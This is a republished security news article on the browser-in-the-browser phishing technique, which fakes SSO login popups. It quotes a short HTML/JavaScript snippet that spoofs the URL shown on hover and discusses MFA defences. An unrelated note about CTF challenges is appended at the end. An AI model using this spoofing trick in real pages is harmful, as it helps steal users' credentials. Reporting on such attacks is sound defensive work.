We’ve had it beaten into our brains: Before you go willy-nilly clicking on a page, check the URL. First things first, the tried-and-usually-but-not-always-true advice goes, check that the site’s URL shows “https,” indicating that the site is secured with TLS/SSL encryption.

If only it were that easy to avoid phishing sites. In reality, URL reliability hasn’t been absolute for a long time, given things like homograph attacks that swap in similar-looking characters in order to create new, identical-looking but malicious URLs, as well as DNS hijacking, in which Domain Name System (DNS) queries are subverted.

Now, there’s one more way to trick targets into coughing up sensitive info, with a coding ruse that’s invisible to the naked eye. The novel phishing technique, described last week by a penetration tester and security researcher who goes by the handle mr.d0x, is called a browser-in-the-browser (BitB) attack.

The method takes advantage of third-party single sign-on (SSO) options embedded on websites that issue popup windows for authentication, such as “Sign in with Google,” Facebook, Apple or Microsoft. The researcher used Canva as an example: In the log-in window for Canva shown below, the popup asks users to authenticate via their Google account.

Login to Canva using Google account credentials. Source: mr.d0x

It’s Easy to Fabricate an Identical, Malicious Popup

These days, SSO popups are a routine way to authenticate when you sign in. But according to mr.d0x’s post, completely fabricating a malicious version of a popup window is a snap: It’s “quite simple” using basic HTML/CSS, the researcher said.
The concocted popups simulate a browser window within the browser, spoofing a legitimate domain and making it possible to stage convincing phishing attacks. “Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and [it’s] basically indistinguishable,” mr.d0x wrote.

The report provided an image, included below, that shows a side-by-side of a fake window next to the real window.

Nearly identical real vs. fake login pages. Source: mr.d0x.

“Very few people would notice the slight differences between the two,” according to the report. JavaScript can make the window appear on a link, button click or page loading screen, the report continued. As well, libraries – such as the popular JQuery JavaScript library – can make the window appear visually appealing … or, at least, visually bouncy, as depicted in the .gif provided in the researcher’s demo and shown below.

BitB demo. Source: mr.d0x.

Hovering Over Links: Another Easily Fooled Security Safeguard

The BitB attack can also flummox those who use the trick of hovering over a URL to figure out if it’s legitimate, the researcher said: If JavaScript is permitted, the security safeguard is rendered ineffective. The writeup pointed to how HTML for a link generally looks, as in this sample:

    <a href="https://gmail.com">Google</a>

“If an onclick event that returns false is added, then hovering over the link will continue to show the website in the href attribute but when the link is clicked then the href attribute is ignored,” the researcher explained.
“We can use this knowledge to make the pop-up window appear more realistic,” they said, providing this visually undetectable HTML trick:

    <a href="https://gmail.com" onclick="return launchWindow();">Google</a>

    function launchWindow(){
        // Launch the fake authentication window
        return false; // This will make sure the href attribute is ignored
    }

All the More Reason for MFA

The BitB technique thus undercuts both the “https” designation as a sign of a trustworthy site and the hover-over-it security check. “With this technique we are now able to up our phishing game,” the researcher concluded.

Granted, a target user would still need to land on a threat actor’s website for the malicious popup window to be displayed. But once the fly has landed in the spider’s web, there’s nothing alarming to make them struggle against the idea of handing over SSO credentials. “Once landed on the attacker-owned website, the user will be at ease as they type their credentials away on what appears to be the legitimate website (because the trustworthy URL says so),” mr.d0x wrote.

But there are other security checks that the BitB attack would have to overcome: namely, those that don’t rely on the fallibility of human eyeballs. Password managers, for example, probably wouldn’t autofill credentials into a fake BitB popup because the software wouldn’t interpret it as a real browser window.

Lucas Budman, CEO of passwordless workforce identity management firm TruU, said that with these attacks, it’s just a matter of time before people fork over their passwords to the wrong person, thereby relegating multifactor authentication (MFA) to “a single factor as the password is already compromised.” Budman told Threatpost on Monday that password reuse makes the attack particularly dangerous, including for sites that aren’t MFA-enabled. “As long as username/password is used, even with 2FA, it is completely vulnerable to such attacks,” he said via email.
“As bad actors get more sophisticated with their attacks, the move to passwordless MFA is more critical now than ever. Eliminate the attack vector by eliminating the password with password-less MFA.”

By passwordless MFA, he is, of course, referring to ditching passwords or other knowledge-based secrets in favor of providing a secure proof of identity through a registered device or token. GitHub, for one, made a move on this front in May 2021, when it added support for FIDO2 security keys for Git over SSH in order to fend off account hijacking and further its plan to stick a fork in the security bane of passwords.

The portable FIDO2 fobs are used for SSH authentication to secure Git operations and to forestall the misery that unfurls when private keys accidentally get lost or pilfered, when malware tries to initiate requests without user approval or when researchers come up with newfangled ways to bamboozle eyeballs – BitB being a case in point.

Source: https://threatpost.com/browser-in-the-browser-attack-makes-phishing-nearly-invisible/179014/
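The hover trick described in the article relies on a link carrying both an `href` and an inline `onclick` handler. As a rough defensive sketch (not something from the article or from mr.d0x), a page's HTML can be scanned for that pattern. `findLinksWithInlineOnclick` is a hypothetical name, and the regex-based matching is an assumption that only handles simple, quoted attributes; handlers attached from script are not detected.

```javascript
// Hypothetical helper: list href values of <a> tags that also carry an
// inline onclick attribute, i.e. links whose hover text may not reflect
// what a click actually does.
function findLinksWithInlineOnclick(html) {
  const anchorTags = html.match(/<a\b[^>]*>/gi) || [];
  const suspicious = [];
  for (const tag of anchorTags) {
    const href = /\bhref\s*=\s*["']([^"']*)["']/i.exec(tag);
    const hasOnclick = /\bonclick\s*=/i.test(tag);
    if (href && hasOnclick) {
      suspicious.push(href[1]);
    }
  }
  return suspicious;
}

// Illustrative input based on the two link samples quoted in the article.
const samplePage =
  '<a href="https://gmail.com" onclick="return launchWindow();">Google</a>' +
  '<a href="https://gmail.com/help">Help</a>';

console.log(findLinksWithInlineOnclick(samplePage));
```

An inline `onclick` is common on legitimate pages too, so a hit is a prompt for manual review rather than proof of phishing.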

-

The challenges are still available (the vast majority of them). We will publish the write-ups soon. We look forward to your feedback. Most likely they will no longer be available starting next week, but we will publish their source code (for the vast majority of them).

-